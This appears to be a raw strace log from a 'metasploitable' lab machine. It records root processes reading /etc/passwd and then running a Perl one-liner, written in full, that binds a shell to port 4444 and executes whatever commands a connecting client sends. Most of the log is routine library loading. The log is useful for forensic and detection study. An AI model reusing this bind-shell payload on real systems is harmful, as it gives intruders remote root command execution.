5651  07:10:01.103296 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5651  07:10:01.103440 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5651  07:10:01.103458 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dbd000

5651  07:10:01.103470 mmap2(0xb7dc6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dc6000

5651  07:10:01.103486 close(1)          = 0

5651  07:10:01.103508 munmap(0xb7f78000, 29913) = 0

5651  07:10:01.103525 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5651  07:10:01.103540 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5651  07:10:01.103552 _llseek(1, 0, [0], SEEK_CUR) = 0

5651  07:10:01.103564 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5651  07:10:01.103581 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f7f000

5651  07:10:01.103592 _llseek(1, 1624, [1624], SEEK_SET) = 0

5651  07:10:01.103607 munmap(0xb7f7f000, 1624) = 0

5651  07:10:01.103617 close(1)          = 0

5651  07:10:01.103648 getpgrp()         = 3831

5651  07:10:01.103659 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5651  07:10:01.103675 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5651  07:10:01.103692 brk(0x8101000)    = 0x8101000

5651  07:10:01.103724 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5651  07:10:01.103739 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5651  07:10:01.103754 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5651  07:10:01.103793 brk(0x8102000)    = 0x8102000

5651  07:10:01.103847 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5651  07:10:01.103885 stat64("/sbin/AB", 0xbfeb4508) = -1 ENOENT (No such file or directory)

5651  07:10:01.103898 stat64("/bin/AB", 0xbfeb4508) = -1 ENOENT (No such file or directory)

5651  07:10:01.103909 stat64("/usr/sbin/AB", 0xbfeb4508) = -1 ENOENT (No such file or directory)

5651  07:10:01.103921 stat64("/usr/bin/AB", 0xbfeb4508) = -1 ENOENT (No such file or directory)

5651  07:10:01.103940 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5651  07:10:01.103956 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7df36f8) = 5652

5652  07:10:01.104010 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5652  07:10:01.104026 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5652  07:10:01.104039 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5652  07:10:01.104051 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5652  07:10:01.104067 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5652  07:10:01.104083 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5652  07:10:01.104096 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5652  07:10:01.104155 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5652  07:10:01.104170 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5652  07:10:01.104244 exit_group(127)   = ?

5651  07:10:01.118119 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5651  07:10:01.118119 --- SIGCHLD (Child exited) @ 0 (0) ---

5651  07:10:01.118119 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5652

5651  07:10:01.118119 waitpid(-1, 0xbfeb4188, WNOHANG) = -1 ECHILD (No child processes)

5651  07:10:01.118119 sigreturn()       = ? (mask now [])

5651  07:10:01.118120 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5651  07:10:01.118152 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5651  07:10:01.118180 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5651  07:10:01.118193 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5651  07:10:01.118212 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5651  07:10:01.118224 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5651  07:10:01.118261 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5651  07:10:01.118282 stat64("/sbin/perl", 0xbfeb4538) = -1 ENOENT (No such file or directory)

5651  07:10:01.118294 stat64("/bin/perl", 0xbfeb4538) = -1 ENOENT (No such file or directory)

5651  07:10:01.118306 stat64("/usr/sbin/perl", 0xbfeb4538) = -1 ENOENT (No such file or directory)

5651  07:10:01.118349 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5651  07:10:01.118383 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5651  07:10:01.118409 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5651  07:10:01.118424 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7df36f8) = 5653

5653  07:10:01.118478 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5653  07:10:01.118494 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5653  07:10:01.118508 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5653  07:10:01.118520 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5653  07:10:01.118535 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5653  07:10:01.118550 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5653  07:10:01.118563 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5653  07:10:01.118599 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5653  07:10:01.118691 brk(0)            = 0x8153000

5653  07:10:01.118712 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.118728 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f63000

5653  07:10:01.118743 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.118761 open("/etc/ld.so.cache", O_RDONLY) = 1

5653  07:10:01.118774 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5653  07:10:01.118792 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5b000

5653  07:10:01.118802 close(1)          = 0

5653  07:10:01.118813 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.118829 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5653  07:10:01.118886 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5653  07:10:01.119000 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5653  07:10:01.119018 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f57000

5653  07:10:01.119030 mmap2(0xb7f59000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f59000

5653  07:10:01.119047 close(1)          = 0

5653  07:10:01.119058 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.119073 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5653  07:10:01.119087 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5653  07:10:01.119175 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5653  07:10:01.119192 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f32000

5653  07:10:01.119204 mmap2(0xb7f55000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f55000

5653  07:10:01.119219 close(1)          = 0

5653  07:10:01.119231 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.119245 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5653  07:10:01.119259 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5653  07:10:01.119379 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5653  07:10:01.119411 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f31000

5653  07:10:01.119424 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f19000

5653  07:10:01.119435 mmap2(0xb7f2d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f2d000

5653  07:10:01.119450 mmap2(0xb7f2f000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f2f000

5653  07:10:01.119464 close(1)          = 0

5653  07:10:01.119476 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.119490 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5653  07:10:01.119504 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5653  07:10:01.119593 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5653  07:10:01.119610 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dca000

5653  07:10:01.119622 mmap2(0xb7f13000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f13000

5653  07:10:01.119636 mmap2(0xb7f16000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f16000

5653  07:10:01.119650 close(1)          = 0

5653  07:10:01.119662 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5653  07:10:01.119676 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5653  07:10:01.119691 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5653  07:10:01.119784 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5653  07:10:01.119801 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d98000

5653  07:10:01.119812 mmap2(0xb7da1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7da1000

5653  07:10:01.119827 mmap2(0xb7da3000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da3000

5653  07:10:01.119866 close(1)          = 0

5653  07:10:01.119906 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d97000

5653  07:10:01.119919 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d978c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5653  07:10:01.119981 mprotect(0xb7f13000, 4096, PROT_READ) = 0

5653  07:10:01.120008 munmap(0xb7f5b000, 29913) = 0

5653  07:10:01.120021 set_tid_address(0xb7d97908) = 5653

5653  07:10:01.120030 set_robust_list(0xb7d97910, 0xc) = 0

5653  07:10:01.120040 futex(0xbf8d2d70, 0x81 /* FUTEX_??? */, 1) = 0

5653  07:10:01.120055 rt_sigaction(SIGRTMIN, {0xb7f1d2c0, [], SA_SIGINFO}, NULL, 8) = 0

5653  07:10:01.120068 rt_sigaction(SIGRT_1, {0xb7f1d340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5653  07:10:01.120080 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5653  07:10:01.120094 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5653  07:10:01.120114 uname({sys="Linux", node="metasploitable", ...}) = 0

5653  07:10:01.120160 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5653  07:10:01.120206 brk(0)            = 0x8153000

5653  07:10:01.120216 brk(0x8174000)    = 0x8174000

5653  07:10:01.120259 getuid32()        = 0

5653  07:10:01.120269 geteuid32()       = 0

5653  07:10:01.120279 getgid32()        = 0

5653  07:10:01.120288 getegid32()       = 0

5653  07:10:01.120325 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d76000

5653  07:10:01.120392 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5653  07:10:01.120427 read(1, "\235\360\0\321", 4) = 4

5653  07:10:01.120441 close(1)          = 0

5653  07:10:01.120459 time(NULL)        = 1495624201

5653  07:10:01.120500 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf8d2a40) = -1 ENOENT (No such file or directory)

5653  07:10:01.120518 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf8d2a40) = -1 ENOENT (No such file or directory)

5653  07:10:01.120531 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf8d2a40) = -1 ENOENT (No such file or directory)

5653  07:10:01.120547 stat64("/usr/local/lib/perl/5.8.7", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120559 stat64("/usr/local/share/perl/5.8.7", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120572 stat64("/usr/local/lib/perl/5.8.6", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120583 stat64("/usr/local/share/perl/5.8.6", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120595 stat64("/usr/local/lib/perl/5.8.4", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120607 stat64("/usr/local/share/perl/5.8.4", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120619 stat64("/usr/local/lib/perl/5.8.3", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120631 stat64("/usr/local/share/perl/5.8.3", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120642 stat64("/usr/local/lib/perl/5.8.2", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120654 stat64("/usr/local/share/perl/5.8.2", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120666 stat64("/usr/local/lib/perl/5.8.1", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120677 stat64("/usr/local/share/perl/5.8.1", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120689 stat64("/usr/local/lib/perl/5.8.0", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120704 stat64("/usr/local/share/perl/5.8.0", 0xbf8d2b80) = -1 ENOENT (No such file or directory)

5653  07:10:01.120727 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8d2878) = -1 ENOTTY (Inappropriate ioctl for device)

5653  07:10:01.120741 _llseek(0, 0, [0], SEEK_CUR) = 0

5653  07:10:01.120753 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8d2878) = -1 EBADF (Bad file descriptor)

5653  07:10:01.120764 _llseek(1, 0, 0xbf8d28c0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

5653  07:10:01.120774 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8d2878) = -1 EINVAL (Invalid argument)

5653  07:10:01.120785 _llseek(2, 0, 0xbf8d28c0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

5653  07:10:01.120796 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

5653  07:10:01.120808 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8d2938) = -1 ENOTTY (Inappropriate ioctl for device)

